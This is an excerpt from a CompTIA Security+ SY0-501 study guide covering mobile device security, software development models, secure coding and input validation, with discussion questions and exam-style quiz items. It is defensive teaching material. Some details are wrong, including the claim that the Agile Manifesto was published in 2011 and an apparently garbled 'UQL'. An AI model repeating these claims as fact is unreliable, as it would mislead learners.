password-protected screensaver, but in addition to passwords lock screen can also be secured by PINs or
patterns easier to enter without a keyboard. Alternatively, the device can have a biometric scanner allowing a

CompTIA Security+ Exam SY0-501 327


Chapter 6: Securing hosts and data / Module C: Mobile device security

fingerprint or even the user's face to unlock it. To allow temporary access for users, you could lock the device
while allowing access to a single app, or mark specific apps as requiring special authentication.
Mobile authentication problems aren't just limited to signing onto the device itself, but also when users want
to access network services from their devices. Since mobile devices are harder to control or fingerprint than
workstations, it can be hard to be certain a user is connected from their own device, or that the device hasn't
been compromised. One solution is more complex context-aware authentication methods that take additional
factors into account, such as the device's location, or the data or resources being accessed.
A closely related concept in mobile authentication is geofencing, or using location data from a mobile device
in order to allow or restrict access to applications or device features. For example, geofencing software could
be used to disable a device's camera in sensitive areas of the building, or to restrict viewing of particularly
sensitive data in public areas where it might be read by unauthorized users.

Screen lock options


Every mobile operating system includes screen lock features. Windows tablets simply use the same lock
screens workstations do. With iOS the exact options available will depend on your OS version and the model
of your device. With Android, you also can download third party authentication apps, and your device
manufacturer might have installed custom software already. On a modern device, several options might be
available.

Exam Objective: CompTIA SY0-501 2.5.2.6, 2.5.2.8, 2.5.2.9

Swipe screen Swipe a finger across the screen, or a certain part of the screen, to unlock. This doesn't offer
any security against intrusion at all: at best, it prevents accidental input.
Password A strong password provides very strong authentication, but it's more trouble to enter on a
touchscreen keyboard than a physical one, especially if it includes mixed cases and special
characters.
Passcode/PIN Unlock the device with a numeric passcode. Not as strong as a password, but easier to enter,
and even a four-digit PIN allows for 10,000 combinations.
Pattern Unlock the device by drawing a predefined pattern over points on the screen. This can be
easier than a passcode, but choosing a pattern that's both easy to enter and hard to guess
might be challenging.
Fingerprint A device with a fingerprint scanner isn't entirely foolproof—it's not just spy movie stuff for a
clever hacker make a "fake finger" from some glue and an existing fingerprint smudge on
the screen. That said, it's strong protection against most intruders.
Face Uses the device camera and face recognition software. Can potentially be fooled by using a
photo, but newer versions add additional measures like requiring the user to blink.

Some screen locks have additional security features. Commonly, too many failed attempts will temporarily
lock the phone entirely in order to prevent brute force hacking—you'll have to wait anywhere from thirty
seconds to an hour to try again. In iOS, and some Android apps, you can even configure the device to
permanently erase all data after sufficient (usually ten) failed attempts. This can be very potent protection for
important data, but it makes it easy for a child or mischievous adult to wipe the whole device. Another feature
is a little more subtle: by configuring the camera on the front of the device to take a photo of anyone entering
a wrong code, you can see who it was later.
Many people don't use strong, or often any, security on mobile devices because it's a pain to unlock a device
you intermittently access all day. As one way around this, some devices let you add widgets to the lock screen
that show commonly accessed data. For example, you could check the time and weather on your phone
without unlocking it. Others allow shortcuts to functions that can be used without unlocking, like taking
photos or making phone calls. Some of these options can compromise security so should be used with care.

328 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module C: Mobile device security

Discussion: Mobile device policies


1. Does your organization have a BYOD policy? If so, what are its important terms?
Answers may vary.
2. Does your organization issue company-owned mobile devices? If so, what policies govern their security?
Answers may vary.
3. How are your mobile devices locked?
Answers may vary.

Mobile data protection


On its own, even a strong lockscreen shouldn't be seen as real protection for a device or its data: any system is
much easier to break into when the thief can take it home and work on it at leisure. Simple passcodes can be
eventually broken, and thieves are always compiling or researching security vulnerabilities. SD cards can be
removed and accessed in other devices; while accessing internal memory on a mobile device is harder than
taking the hard drive out of a workstation, it's not impossible either. If you really want your device and its data
to remain secure, you'll want to do more than set a passcode.

Exam Objective: CompTIA SY0-501 2.5.2.3, 2.5.2.12, 2.5.2.13


The best option is to recover the device itself, especially if it's just lost rather than stolen. As long as the
software's set up ahead of time and you have location tracking enabled, Apple's Find my iPhone and Google's
Android Device Manager both allow you to use networking and GPS features to find where a device was last
located from any web browser. If it's on and connected to the network, you can also remotely lock it, remote
wipe its data, or, if you might have just left it in your other coat, make it ring remotely.

MDM software commonly has inventory control features designed to track device ownership and location as
well. Even if location features are disabled, some organizations place RFID chips into company-owned
devices, then use asset tracking systems to locate them at least over short distances.
Even if you can't recover the device, you can recover data using remote backup applications. On an iOS
device, you can configure a daily backup of data to via the iCloud service. Android includes automatic cloud
backup of contacts, calendars, and mail, but more complete solutions are available as apps. Some of these
features can even be used to track a phone too, for example if a thief turned the device on long enough that it
backed itself up.

CompTIA Security+ Exam SY0-501 329


Chapter 6: Securing hosts and data / Module C: Mobile device security

To make sure the data is safe from attackers, most modern devices allow full device encryption to protect all
stored data and even that on microSD cards. By using a key which is built into the device and cannot be
extracted, full device encryption can protect all data on the device with strong encryption, even if someone
tries to read removable storage in another device. All iOS devices running version 8 or newer have encryption
enabled by default, so as long as you use a strong passcode the data is protected. By contrast, almost all
Android devices support encryption, but few have it enabled by default so you'll need to set it up in Settings >
Security. Encrypting removable devices such as microSD cards is an additional option.
Some devices and applications allow for storage segmentation, separating a particular part of device storage
that can be encrypted and controlled separately from the rest. Some storage segmentation applications even
provide encrypted communications for the protected data and applications. This is especially popular for
BYOD configurations: you can define an encrypted container for business-related files and applications, and
worry less about how user data is protected.
Remember, all of these methods need to be configured before the device is lost: if you wait, there's not much
you can do.

Mobile application security


Mobile applications have most of the same security concerns and features desktop applications do, but the
details are different. In particular, since mobile operating systems are much newer and are designed for more
tightly controlled application ecosystems, a lot of security concerns are more centrally and consistently
managed. At the same time, since the operating environment is designed to be less directly managed by the
user and more determined by the device manufacturer or mobile provider, fine control over security can be
more difficult.

Exam Objective: CompTIA SY0-501 2.5.2.1, 2.5.2.5, 2.5.2.7, 2.5.3.11, 2.5.3.12

Application Mobile app stores and developers digitally sign executable files to show that they're
whitelisting genuine and unaltered. By default, most mobile devices won't run applications not
from trusted sources, greatly reducing the chance of trojan horses and other malware.
MDM software adds additional whitelisting options, allowing you to determine what
software is allowed to run on company devices.
Key and credential Mobile applications typically store cryptographic keys, account information, and other
management credentials in a central repository on the device, so that you can view them and back
them up from device settings. Much like on a web browser, stored credentials can be a
security risk, since anyone who has access to the device might automatically be able
to sign into all authenticated apps it has installed.
Geotagging Many mobile applications can append geographical metadata to photographs, videos,
messages, social media postings, and so on. Geotagging data generally includes
latitude, longitude, and a timestamp, but can also include altitude, place names, or
other information. Geotagging can be useful, but also a security and privacy risk: not
only does a geotagged photo show exactly where it was taken, but a geotagged media
posting shows where the user is at the moment. This could show the location of
valuables, or when a user is away from home or the workplace.
Encryption Mobile devices can encrypt secured data, as well as that transmitted over mobile
networks or secured Wi-Fi hotspots, but that doesn't give true end-to-end encryption.
VPNs allow encrypted network traffic even on unsecured Wi-Fi, while other mobile
apps allow encryption of VoIP, email, and text messaging services.
Push notifications Online services can send information to mobile applications without being specifically
requested, even if the application isn't running. This is extremely convenient for
messages and alerts, but some implementations contain security vulnerabilities that
might expose notification content along the way. Sensitive data should only be sent by
notification if it can be protected by end-to-end encryption.

330 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module C: Mobile device security

Application Mobile applications typically request very specific device permissions on install, or
permissions when upgrades give them new capabilities. For example, an application might request
permission to access location data and send text messages. While this has security
benefits, it also means users get used to simply accepting permission requests without
reading them.
Containerization Sometimes the permissions system built into a mobile operating system doesn't give
sufficient security for sensitive applications. Special apps can be used to create secure
containers, sandboxes that certain applications run within. This helps to isolate
sensitive work applications from untrusted personal applications, especially in BYOD
or CYOD deployments where the employer has less direct control of the device.
Transitive trust Mobile applications make wide use of transitive permissions, where an application
authentication gets trust via another application or operating system function which itself has its own
set of permissions. While this isn't inherently insecure and in fact can be used for
enhanced security, it can also create situations where interdependent trust relationships
aren't easily apparent. Then it's easy for an unwitting user to agree to permissions
which compromise security.

Mobile device connections


The main benefit of mobile devices is that you can take them anywhere and even connect to networks almost
anywhere you go. This makes it very easy to connect to untrustworthy networks which will spy on your
communications or even infiltrate your device. Since they're primarily oriented around wireless networks, you
also have to be careful about eavesdroppers. Even a single device might support several types of connection
so you need to know how they work. If you're administering devices for your organization, you'll need to
choose network connections and policies based on your security requirements. In high security environments
you should use management software to monitor or restrict just what connections allowed devices can use.

Exam Objective: CompTIA SY0-501 2.5.1, 2.5.3.10, 2.5.3.13, 2.5.3.14, 2.5.3.15

Wi-Fi The same 802.11 standards family used for wireless workstation connections. Wi-Fi is secure
from local eavesdropping if the AP uses strong authentication and encryption, but many do not
and most APs connect to non-encrypted Ethernet or WAN connections. It's also easy for an
attacker to set up a rogue AP designed to capture your data. If you don't trust a Wi-Fi network,
connect to it through a VPN. Wi-Fi Direct allows a mobile device to make an ad hoc connection
with another Wi-Fi device without connecting to a WAP. This is useful, but also helps attackers
who want to use a mobile device for data exfiltration without being seen on the corporate
network.
Cellular Used to place telephone calls, send text messages, and transfer network data over long
distances. Cellular connections have a much wider range than Wi-Fi, and use built-in
encryption and authentication so eavesdropping usually isn't a problem. Rogue cell towers are
possible but more difficult to set up than rogue APs: while they pose the same risks, they're less
common. Since a cellular connection allows data or SMS/MMS texts to be sent and received
independent of the enterprise network, it can be used for data exfiltration. Combined with Wi-Fi
or USB tethering, it can even create a direct connection between internal systems and the
internet, allowing inside network attacks.
Bluetooth Used to connect to wireless peripherals such as input devices or speakers in a long-term pairing
relationship. Also can be used to transfer files between devices without using the Wi-Fi
network. Bluetooth supports varying ranges, but most mobile devices and peripherals can
connect from up to ten meters away. Bluetooth connections are encrypted, but it's still possible
to connect to unsafe devices. It's best to turn off Bluetooth transceivers you don't use.

CompTIA Security+ Exam SY0-501 331


Chapter 6: Securing hosts and data / Module C: Mobile device security

ANT A communications protocol designed for easy connections between fitness sensors such as heart
rate monitors, cycling computers and similar devices. It's similar to low-powered Bluetooth
standards, but isn't directly compatible; by and large it has the same security features and
weaknesses.
NFC Used for short-distance communications between smartphones and other personal devices,
usually no more than 10cm apart. Unlike Bluetooth it's meant for brief and isolated
communications rather than long-term pairing. NFC is secure enough to use for payment
systems like no-contact credit card scanners, but much of that safety is due to short range and
the fact that NFC sensors on phones turn off when not in active use.
SATCOM Satellite communications require more powerful and specialized transceivers than other
wireless methods, so they're usually only found in expensive satellite phones and external
satellite modems. The main threat to satellite communications is attacks by state actors, but
satellite devices may have backdoors or cryptographic weaknesses an attacker can target. Like
cellular connections, a satellite connection inside the enterprise represents a separate internet
connection.
Infrared Wireless communication using line-of-sight infrared. It was widely popular in the late 1990s
and early 2000s, but once Wi-Fi became widespread it fell by the wayside for consumer
devices. Infrared communications are still used in medical devices, legacy hardware, and
specialty applications where radio communications aren't feasible or desirable. Since many
infrared devices are old they tend to have weak or no encryption. Instead, the line-of-sight
nature of the connection provides some physical security.
USB The only wired data connection supported by most mobile devices smaller than laptops. Since
USB is wired it's less prone to eavesdropping or attack, but it's still a danger to connect to an
untrusted device (in either direction). Additionally, USB connections make mobile devices a
data exfiltration risk in the same way that any removable media is.

Hardening mobile operating systems


Compared to their desktop counterparts, especially in the past, mobile operating systems are fairly well
hardened. By default user accounts don't have root access, and apps run in sandboxes fairly separated from
each other, each with its own well-defined permissions. On top of that, most people get apps from trusted
sources like the Apple, Google, or Amazon app stores, all of which carefully monitor products for any sign of
malware. Finally, on the network mobile devices are less likely to run network server applications or old
insecure protocols than even desktop workstations: this means they're not subject to network attacks
exploiting server processes.
None of this is to say that you shouldn't actively secure a mobile operating system, especially in a high
security environment. It's just that the newest smartphone is going to be a lot safer to just put on the network
than an old Windows XP desktop.

 Apply security patches and updates as soon as they're available.


• OS updates can be large, so perform them over Wi-Fi to avoid data charges.
• Mobile updates are usually quick and painless, but it's safest to back up data beforehand in case
something goes wrong.
 Apps typically update automatically whenever a new version comes out. Updates might include boosted
security features.
• By default, apps only automatically update on Wi-Fi to save data charges.
• When a new app version requires additional permissions, you'll need to approve the update. Review
changes to make sure they're permissions you really want the app to have.

332 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module C: Mobile device security

 Disable unused applications, services, and operating system features. For instance, if you don't use any
Bluetooth devices with your phone, disabling Bluetooth both removes an attack vector and increases
battery life.
 Consider the need for antivirus software.
• Despite some malware being discovered in the past, Apple considers iOS secure enough that
vulnerabilities can be fixed through OS updates alone. Consequently, they don't allow antivirus
software on their app store.
• Some Android vendors pre-install antivirus software, and others are available on Android app stores.
Note that the sandboxed nature of apps makes Android antivirus apps less able to actually remove
potential malware than desktop antivirus.
 Be careful not to install apps from untrusted sources, like poorly verified third-party app stores or private
developers.
• iOS by default only allows installation from Apple's App store. Getting around that usually requires
jailbreaking the phone, specifically permitting an app, or running an "app" that's really just a website.
• Android allows apps from third-party stores without much trouble, which is convenient but a potential
security risk. To ensure that only apps from trusted sources can run, tap Settings > Security, and clear
Unknown Sources.
 Firewalls are not generally necessary on mobile devices, but third party apps are available for Android.
Some require rooting the phone, but others do not.
 Be careful when joining unfamiliar or unsecured Wi-Fi networks: they could allow others to spy on your
communications. For regular communications over unsecured Wi-Fi, consider configuring a VPN.

Discussion: Securing mobile data and applications


1. Why is malware generally less of a threat on mobile devices?
Apart from operating system vulnerabilities, most mobile apps are downloaded from trusted stores and
run in sandboxes.
2. How can you protect your mobile device's data from being lost or stolen?
Possibilities include theft prevention, cloud backup, and device encryption.
3. How can geotagging be a security risk?
One example is that if you make a geotagged post saying that you're out of town, someone could try
breaking into your home or office.

Assessment: Mobile device security


1. What kind of application centrally manages security policy on all company mobile devices? Choose the
best answer.
 Asset tracking
 BYOD
 GPS
 MDM

2. Both iOS and Android include a built-in feature to find and secure a lost device. True or false?
 True
 False

CompTIA Security+ Exam SY0-501 333


Chapter 6: Securing hosts and data / Module C: Mobile device security

3. Both iOS and Android enable data encryption on most devices by default. True or false?
 True
 False

4. What are important security steps on all mobile devices? Choose all that apply.
 Configuring antivirus software
 Configuring remote backup features
 Installing a firewall app
 Regularly applying operating system updates
 Using biometric authentication

5. What kind of policy governs a user-owned device on the corporate network? Choose the best response.
 Acceptable Use
 BYOD
 MDM
 Offboarding

6. Your company allows you to use the same smartphone for both personal and work purposes, but only if
it's one of a half-dozen different models on an approved list. If you don't have an approved device, the
company will pay for part of your upgrade. What kind of deployment model does the company use?
Choose the best response.
 BYOD
 COBO
 COPE
 CYOD

7. What kind of policy governs removal of sensitive data and credentials when a user device is no longer
used for company business?
 Asset tracking
 Offboarding
 Onboarding
 Storage segmentation

8. What connection type is very similar to Bluetooth but used by more specialized devices?
 ANT
 GSM
 NFC
 SATCOM

334 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Summary: Securing hosts and data

Summary: Securing hosts and data


You should now know:
 How to secure data at rest through classification, file permissions, and storage encryption.
 How to secure hosts, whether they're ordinary workstations, servers, or static devices.
 How to secure mobile devices and their data.

CompTIA Security+ Exam SY0-501 335


Chapter 7: Securing network services
You will learn:
 How to secure web applications
 About virtualization and cloud computing risks

CompTIA Security+ Exam SY0-501 337


Chapter 7: Securing network services / Module A: Securing applications

Module A: Securing applications


Web applications are one of the main targets of attack today, and application vulnerabilities are responsible
for many of the most damaging data breaches in recent years. Securing them thoroughly can be challenging,
especially since so many interrelated components are often involved. It doesn't help that they often represent
the most direct bridge between the general public and your most valuable data. Still, most vulnerabilities fit in
set categories that you can look for and mitigate. Some of those are specific to web applications, while others
are common to all software development.
You will learn:
 About secure coding principles
 How to implement input validation
 How to prevent common application attacks
 How to harden applications

Software assurance
Saying that the best way to reduce application vulnerabilities is to use secure coding principles might sound
as pointless as saying the best way to win a ball game is to score more points than the other team. The
problem is, a lot of applications simply aren't designed with security as a primary consideration: developers
work around the clock to make sure everything works, and only then do they think about how to keep
attackers out. In practice, every application will have bugs and oversights that leave openings for attack, but
most exploits are prevented or greatly reduced when developers make security more than an afterthought.
When you're coding your own application, or heavily customizing an existing one, it's obviously your
responsibility to make sure it's securely coded. When you get an application more or less off the shelf you
don't have control over how it was coded, but you can still make sure that the developer designed it securely.
Software assurance resources and certifications are available for both developers and products.
 When buying software from a vendor, examine their security features, and ask questions about their
approach to secure design. Don't forget to look for user reviews and experiences, or ratings by
independent bodies. The Software Assurance Forum for Excellence in Code (SAFECode) is one
industry organization that's issued guidelines for purchasing secure applications.
 When coding an application in-house or through a contractor, ensure that developers are using secure
design principles. A wide variety of security standards and resources are available.

• Open Web Application Security Project (OWASP) is the closest thing to a standards body for web
applications in general.
• NIST and other security organizations have published standards relevant to application
development.
• If your application handles PII or other regulated data, make sure you comply with the applicable
regulations.
• For critical applications, consider a formal security review from an external consultant.

 Ensure that your development and operations teams work together with stakeholders to pursue a secure
product deployment cycle.

Software development models


Any software project that rates the word "development" is a serious enough undertaking that it can benefit
from a formal project management process. Application security in particular is an element that frequently

338 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module A: Securing applications

suffers because developers didn't have a development methodology that was sound enough to detect likely
issues while everyone was busy just "making it work."

Exam Objective: CompTIA SY0-501 3.6.1


The project management process for software development needs to take the entire product life cycle into
account, from when the application's requirements are mapped out to where it's finally retired. The two most
popular development models today are called Waterfall and Agile.

Waterfall vs. Agile development models

Waterfall development is the more traditional of the two. It breaks the software life cycle up into consecutive
phases, one after the other. The first formal description of the Waterfall model described six steps.
1. Requirements Determining what the software's functional and usability requirements will be, along with
the hardware and resources that will be required to run and support it.
2. Analysis Working with stakeholders to turn the requirements document into a a product model of
sufficient detail to begin systems design. Some waterfall models incorporate this into the
requirements phase.
3. Design Creating detailed frameworks and algorithms for how the application will achieve its
functional and usability goals. The design phase maps out the application's look and feel,
chooses the technologies that will be used to develop it, and breaks it up into modular
components which can be coded separately.
4. Development The actual coding of individual modules, and integration of the application into a
functional whole.
5. Testing A systematic process of finding and removing software bugs, and verifying that it meets
stakeholder requirements.
6. Maintenance Deploying and maintaining the application throughout the remainder of its use.

CompTIA Security+ Exam SY0-501 339


Chapter 7: Securing network services / Module A: Securing applications

The waterfall model is a great way to enforce discipline in a project and make sure no important problems are
missed, but it works best for projects that have well-defined phases and especially a well-defined finished
state. Its biggest problems are lack of flexibility; there's limited feedback at many phases of development, and
it's difficult to go back if requirements change before deployment.
By contrast, Agile development follows an iterative or incremental model. It was first formally described by
that name in the Agile Manifesto published in 2011, but its underlying principles have been practiced for a
long time. Instead of a monolithic project, development is broken up into many successive iterations that each
add a little bit more to the product. Each individual iteration has the same phases of requirements through
testing, representing a new software version. Not all iterations will actually be deployed into production, but
each represents a distinct release that can be shared across teams and with stakeholders. Agile development
allows fast delivery and constant user feedback, and it's well-suited to online or cloud distribution where
common software updates aren't difficult. On the other hand, it's more difficult to track documentation, and to
make sure the design principles - including security - remain sound throughout the project.
There are other popular development models as well. Most current trends are variants of Agile development.
One is continuous delivery, which aspires to an ideal where software is constantly being improved yet can be
released into production at any time. Another is DevOps, which is more a set of principles and general
practices than a development model. DevOps stresses the collaboration of developers and IT operations teams
to form an environment where software can be rapidly developed, tested, and released in a largely automated
process.

Secure DevOps practices


For the most part, the details of software development are matters for software developers and project
managers, but as a security professional you should help to make sure security is a primary goal through the
entire process. A lot of it is attention to detail and careful documentation to make sure vulnerabilities aren't
introduced or can be found and secured quickly, but iterative and continuous development processes make it
difficult. Fortunately, there are several popular DevOps principles which are useful for security in particular.

Exam Objective: CompTIA SY0-501 3.6.2

Security automation Designing functional and repeatable security tests which can be applied to each
new development iteration, with a minimum of human labor needed.
Continuous integration Continuously merging source code created by different individual developers or
teams into a shared whole. This prevents divergence and conflicts between code
written by different developers, which is a frequent source of security
vulnerabilities.
Baselining Establishing a known good set of security requirements and configuration details
that support them, then using that baseline as a starting point and effective security
minimum for any necessary changes.
Immutable systems Deploying systems or other infrastructure as a monolithic instance that can be
replaced by the next iteration, but not modified or upgraded. This prevents
accidents during modification or configuration from introducing unforeseen
vulnerabilities. For example, each new version of an application might be
distributed as a virtual machine or system image preconfigured to the security
baseline.
Infrastructure as code Writing code that can provision or configure infrastructure such as servers and
network appliances, so that a new iteration can be deployed rapidly and with
minimal chance for error. This is more complex than writing deployment scripts:
the programmable infrastructure code must itself be developed by secure
principles.

340 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module A: Securing applications

Program life cycles


When you think of application vulnerabilities, it's also helpful to imagine the software life cycle from the
perspective of the program itself. Every phase of a program's existence is a time when errors can occur, or
when attacks can take place.

Exam Objective: CompTIA SY0-501 3.6.7

Development When the program is being written in the first place, or edited from a previous version. At this
point it exists as source code intended to be read and edited at least in part by humans.
Compile When the program is being converted from source code into executable machine code by a
program called a compiler.
Linking When components of the program are connected to each other, including external libraries
containing functions not in the core program.
Distribution When the program is sent from the developer to the systems which will run it. This can
include printing to physical media or downloading from the internet.
Installation When the program is placed onto the system which will execute it. This can be as simple as
copying it to a hard drive, or might take extensive preparation to integrate with the operating
system and other applications.
Load time When the program is retrieved from storage and placed into memory so it can be executed.
Runtime When the program is actually being executed.

These phases don't necessarily take place in just that order. For example, some programs are distributed as
compiled machine code, while others are source code that is compiled during installation, or even right at
execution. Linking can be divided into static linking performed by the compiler during compilation, or
dynamic linking performed by the operating system during load time or runtime.

CompTIA Security+ Exam SY0-501 341


Chapter 7: Securing network services / Module A: Securing applications

Deployment environments
Another term for the whole process of getting software ready for use is deployment. It's a bit broader than
"development" because it explicitly covers both applications your organization develops itself, and off-the-
shelf solutions you just need to put into production. Since in the end you're responsible for vulnerabilities in
the end result, awareness of the whole process is important either way.

Exam Objective: CompTIA SY0-501 3.4.1, 3.4.2, 3.4.3


Every stage of the deployment process needs its own deployment environment of appropriate hardware and
software. This prevents the risks of using untested and potentially unsafe code on production systems. Secure
baselines and appropriate sandboxing prevent unstable or malicious programs from affecting other systems. A
typical deployment process might include four environments.

Development The environment where the application is initially written and compiled, such as a developer's
workstation. Development environments frequently are very different from the production
environment, but they don't need to test a complete and working product.
Test A software environment on a physical or virtual computer which allows a more-or-less
complete application to be tested by humans or automated tools. Some projects use many test
environments running in parallel to allow more rapid and automated testing.
Staging A pre-production environment that closely mirrors the intended production environment, and
even connects to external databases or other software environments. A staging environment is
still intended for testing purposes, but it's better suited for testing system configurations and
the software's ability to withstand attacks or heavy loads.
Production The environment used for the final, functional software.

Some projects use additional environments. For example, you might create an experimental sandbox
environment for testing ideas you don't plan on putting in production, or a disaster recovery environment that
can take over for a failed production environment.
Every environment needs to have security controls to protect it against potential threats, but the threats facing
each environment are different, so each needs a different set of baselines.
 Production environments are typically the most visible to outside attack, and system failure in a
production environment will do the most harm to business functions.
 Staging environments are an ideal time to test security controls, so should be protected similarly to
production environments.
 Test and especially development environments are a tempting target for an attacker who wants to
examine application functions, or to steal or modify source code.
 Any environment that handles sensitive data such as PII can expose that data to a successful attacker.
Where possible, security in test or staging environments can be enhanced by using placeholder data
rather than real data.

Discussion: Secure development


1. What custom software does your organization use? If none, what might it find useful?
Answers may vary.
2. Choose a piece of software you know well. What can you say about its development life cycle?
Answers may vary.
3. Why is it more secure to distribute a software product as an immutable system?
It helps prevent user error or compatibility issues when installing or upgrading the software.

342 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module A: Securing applications

Secure coding principles


While the security features needed by a given application depend on exactly what it does and what tools are
used to design it, securely coded and configured applications follow the same general principles. Most of
them come down to the same central idea: applications should be as distrusting as possible when they deal
with other applications or with end users.

Exam Objective: CompTIA SY0-501 1.6.4, 3.6.5.1, 3.6.5.2, 3.6.5.6, 3.6.5.10, 3.6.5.12

Least privilege Applications should not only should be restrictive of the privileges they give to users, but
also to those they give to other applications or components they interact with. Poorly
designed and configured applications often run in privileged environments, and easily pass
those privileges on to related components or even anonymous users.
Input validation Insecure web applications will attempt to process whatever input data they receive, whether
it's what they expect or not. Carefully malformed data can be used to perform injection
attacks or buffer overflows, enabling and attacker to compromise a whole application just
by filling a field out improperly. Secure applications validate all input they receive before
processing it, and reject anything unexpected.
Input Web applications commonly interact with back end databases or command shells, passing
sanitization user input on as part of SQL queries or other commands. This allows injection attacks: if
the input itself resembles valid code, the back end system might process its commands
along with the application query. Sufficiently strict validation can prevent this too, but for
secure coding it's safer and easier to sanitize output by adding escape characters before
passing it on. That way, even if a valid input resembles code, it won't be treated as such.
Cryptography Cryptographic technologies can be used in many ways to protect data and applications. You
should use strong encryption for connections over sensitive networks, and possibly for
storage. File integrity can be protected by hashing, and program authenticity by code
signing. Weak ciphers or implementations can be as bad as none at all, so be sure to use
proven technologies rather than coding custom methods.
Code Most coding languages allow comments which are ignored by the compiler or interpreter
commentary but are meaningful to a human reviewing source code. They may contain notes and
placeholders made during development, or explanations of what the code itself does to
anyone who might review or edit it late. Programmers have varying views of how much
commentary is appropriate in a program, but all agree that code that might be seen by an
untrusted viewer (such as that of a web page) should never contain sensitive information in
its comments.
Data exposure Insecure applications frequently do not adequately protect sensitive information they store,
transmit, or execute. Sensitive data such as session tokens, passwords, and PII in database
fields should never be readable by untrusted users or processes. Strong cryptography is a
good way to protect data, but the first step is making sure all sensitive data is identified so
that it can be protected. In particular, encryption keys and certificates must also be stored
and transmitted such that private keys are never exposed to someone who shouldn't have
them.
Memory Carelessness with how memory and variables are allocated and used can leave an
management application vulnerable to memory leaks as well as all sorts of attacks: null pointer
dereferences, race conditions, buffer overflows, or integer overflows. Secure applications
release dynamically allocated memory when it's no longer needed, and protect pointers and
variables with a combination of careful coding, language tools, and operating system
protections.

CompTIA Security+ Exam SY0-501 343


Chapter 7: Securing network services / Module A: Securing applications

Error and Applications need to handle errors gracefully. That doesn't just mean they don't crash when
exception something unexpected happens: it's also important that they don't create security
handling vulnerabilities when they react. Secure applications should in general be fail safe designs,
rather than fail open.
 When something goes wrong or an authentication process seems ambiguous, the
application should err on the side of denying authorization.
 Applications should not commit to multi-step processes unless they can be
completed entirely: for example, if a database value is supposed to be moved from
one field to another, the original value shouldn't be deleted if there's an error writing
to the new location.
 Error messages shown to end users should have little data that's of use to an attacker.
Detailed debug messages can contain sensitive information of all sorts up to and
including database dumps. Even less detailed error messages can help an attacker
fine tune an attack by playing "hot or cold" with the results. For example, imagine
you're an attacker guessing random user names and passwords to log into an
application. A "wrong password for username jsims" error suggests that you guessed
a valid user name and now just need to crack the password. A "wrong user
name/password" error doesn't tell you anything useful.
 In contrast to messages sent to end users, error logging recorded for application
administrators should be logged in detail, including not only the nature of the error,
but the content and source of the input that generated it. This helps both application
debugging and detection of potential attacks.

Input validation
Imagine that your bank has a web form that requires users to input a 12-digit account number. What happens
if someone fills it out with 10 digits, or 20, or 200? What if it's their full name, or a random string of
characters? How about an SQL query to delete the "Users" table? What if they paste in a binary file
containing a virus? If the web application uses good input validation, all the user would see is an error
message saying something like "Account number should be 12 digits without dashes." You've doubtless seen
the like when you entered out a web form improperly in the past. The problem is that a lot of applications
don't do this, or don't do it consistently and thoroughly enough to protect against the many attacks relying on
similar exploits. This means that the wrong data coming into the application from a web user might cause any
sort of damage from database corruption to data breaches to system crashes.

Exam Objective: CompTIA SY0-501 3.6.5.3


Input validation functions can validate queries by filtering for various problems that might cause errors or
allow exploits.

344 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module A: Securing applications

Improper characters Most fields are designed to hold certain data types. If a field is designed for only
numbers, it shouldn't allow letters or special characters. Even a field allowing special
characters might only allow certain ones. An email address needs to have a @
somewhere in it to be valid. Some fields should always follow a fixed format: for
example a US social security number should always follow the format ###-##-####.
In that case, a developer could even program the field to automatically insert the
dashes if the user does not, or strip them out before passing them on to the database,
depending on how they're stored.
Unicode characters Fields accepting Unicode text input are a special case of improper characters.
Unicode text allows thousands of different characters, but often the same visual
character can be encoded in multiple different ways. Since to a computer the code is
the important part, it's often a good idea to normalize Unicode input, converting it so
that the underlying code for any given character is always the same.
Improper length Many fields have a minimum or maximum length: for example, a US Zip code is
always either 5 or 9 digits. Buffer overflow attacks rely on sending more data than an
application expects, so it's most important to set maximum lengths for a given field.
Improper values Some fields, especially numeric ones, might be used as variables in program
functions, and a value outside of the expected range can cause problems. For
example, no one should be able to enter a negative monetary value when making an
online payment, and improperly large values in other fields can trigger integer
overflow or buffer overflow problems.
SQL code SQL injection attacks can happen when carefully crafted SQL code entered into an
input field is passed on to a back end database that unwittingly executes it as a query.
Filtering characters like -, =. and ' can prevent this. In fields where the characters or
even the code itself otherwise make sense, such as the message field for someone
posting on a coding forum, the input still needs to be sanitized by marking those
characters so the database knows they're not part of a command. The same is true of
UQL or other database languages, though they use different commands and syntax.
Browser code XSS attacks work by inserting scripts using browser-side languages like JavaScript,
HTML, or Flash into fields where a target's web browser will mistake them for
trusted page content. Even just blocking or sanitizing the < and > characters used by
HTML tags can prevent most of these.

Client-side vs. server-side validation


You can perform input validation either on the client, or on the server.

Exam Objective: CompTIA SY0-501 3.6.5.4, 3.6.5.9

 Client-side validation uses browser scripts in the page initially sent by the server. Its main advantage is
that it can work instantaneously without network communication. If a basic web form simply prevents
you from typing too many digits into the phone number field, or shows an error message about an
improper value as soon as you move to the next field, it's probably using client-side validation.
 Server-side validation uses code on the web application server to validate code before the rest of the
program actually acts on it. Its main advantage is that it can't be bypassed by flaws or modifications
made to the browser, but there's no way of doing it without sending data to the server. For a simple web
form, server-side validation won't catch an error until you submit the form and receive an error
message in reply.

CompTIA Security+ Exam SY0-501 345


Chapter 7: Securing network services / Module A: Securing applications

Client-side validation is more convenient, and often easier to implement, but it poses a security risk. Since
users, including attackers, have control of their browser environments, they can block or alter scripts they
don't like. An attacker can even directly alter the HTTP output sent from their browser before it actually
reaches the server. If you have to pick only one, server-side validation is always better for security.
Fortunately, there's no need to choose. By implementing the same validation standards both client-side and
server-side, you can have the benefits of both.
Related to input validation, one of the prime server-side protections against injection attacks is in
programming just how the application sends queries to the database.
 Applications can use prepared statements, prewritten queries written with placeholder values which are
compiled once rather than every time they're run. When the application submits the query again it just
fills user data into the placeholders without the database having to parse it all over again. Not only does
this improve performance, it makes it easier for the database to separate query structure from data.
 Databases can use stored procedures, prewritten queries that are stored inside the database logic itself.
The application then just needs to call the procedure and pass on user data. The security and
performance benefits are similar to that of prepared statements, but which is easier to implement
depends on the application and server structure.

